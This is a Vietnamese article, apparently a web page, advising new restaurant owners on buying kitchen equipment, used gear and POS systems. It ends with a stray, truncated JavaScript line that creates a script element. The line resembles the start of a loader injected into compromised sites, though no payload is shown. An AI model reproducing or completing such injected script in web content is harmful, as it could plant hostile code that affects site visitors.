Lời khuyên lựa chọn thiết bị cho nhà hàng

Có nhiều khu vực để xem xét khi mở một nhà hàng mới. Một trong những điều quan trọng nhất – và tốn kém nhất – là thiết bị nhà hàng. Cho dù bạn có kế hoạch thuê thiết bị nhà hàng, hoặc mua thiết bị mới hay đã sử dụng, chúng tôi sẽ cho bạn một số lời khuyên. Hiểu biết về những loại thiết bị, vật tư bạn cần, giữ cho mọi thứ đơn giản thì có ba cách để giữ cho các chi phí thấp để bạn sẵn sàng mở một nhà hàng mới.

thiet-bi-nha-hang

Tạo một danh sách tất cả mọi thứ cần thiết để mở một nhà hàng

Bạn có thể ngạc nhiên về độ dài danh sách này. Mở một nhà hàng mới lần đầu nghĩa là mua tất cả mọi thứ, từ dãy nhà bếp đến đế lót ly cho quầy bar. Bao gồm các thiết bị nhà bếp, nội thất phòng ăn, bìa menu, thiết bị vệ sinh, thiết bị quầy bar, và những thứ khác nữa. Đừng quên khu vực nhà vệ sinh, khu ngồi chờ và khu ăn uống bên ngoài, nếu có.

Nghiên cứu lựa chọn

Một khi bạn đã hoàn thành danh sách tất cả mọi thứ bạn cần, sau đó dành thời gian để xem nhà cung cấp nào có giá tốt nhất. Bên cạnh các nhà cung cấp địa phương, kiểm tra các nhà bán lẻ hàng trực tuyến để hưởng ưu đãi tốt. Bạn cũng có thể tiết kiệm hàng trăm và hàng ngàn đô la bằng cách mua thiết bị nhà hàng đã qua sử dụng. Và đừng ngại mặc cả với các đại lý thiết bị đã qua sử dụng. Không giống như các nhà sản xuất, giá cả của họ thường không cứng nhắc. Ngoài ra, yêu cầu một số khuyến mại, nếu bạn đang mua một số thiết bị. Ví dụ, bạn có thể có được giá ưu đãi của một số sản phẩm nếu bạn mua thiết bị với số lượng lớn.

Chọn thiết bị nhà hàng đơn giản

Khi chúng tôi mở nhà hàng thứ hai, chúng tôi đã mua máy làm lạnh phù hợp với chảo. Ý tưởng là những đầu bếp nhà hàng có thể làm việc hiệu quả hơn là do thực phẩm đông lạnh như khoai tây chiên, gà lắc, cánh gà sẽ nằm trong tầm tay. Nếu không, các loại thực phẩm đông lạnh sẽ được lưu trữ trong tủ lạnh lớn hơn ở phía đối diện (vì là một nhà bếp nhỏ và không có cách nào để đặt tủ lạnh và nồi chiên gần nhau). Đấy là còn chưa nói đến việc mở cửa tủ thường xuyên và đóng cửa (thường đóng sầm) điều đó xảy ra trong nhà bếp của nhà hàng lúc đông khách. Với tất cả các loại chuông và còi inh ỏi vào thời điểm đó. Một lò hơi đơn giản, có vẻ như không tốt đẹp như một lò nướng đối lưu kép với bộ cảm biến nhiệt bên trong, nhưng nó là một sự lựa chọn hợp lý hơn trong thời gian dài và ít có khả năng sẽ thay thế thiết bị trong thời gian ngắn.
Một khu vực mà rất ít tiếng chuông và còi, là điểm thu ngân, máy bán hàng. Cùng với việc theo dõi doanh số, hệ thống máy bán hàng có thể giúp theo dõi thực phẩm và hàng tồn kho và thậm chí là chi phí tiền lương. Tùy thuộc vào quy mô nhà hàng của bạn, bạn có thể chỉ cần một hoặc hai trạm máy bán hàng (POS). Hãy chắc chắn rằng bất cứ hệ thống nào mà bạn chọn có bảo hành và một kế hoạch bảo trì, nếu bạn không am hiểu máy tính.

Theo Aboutmoney

var d=document;var s=d.createElement(‘script’);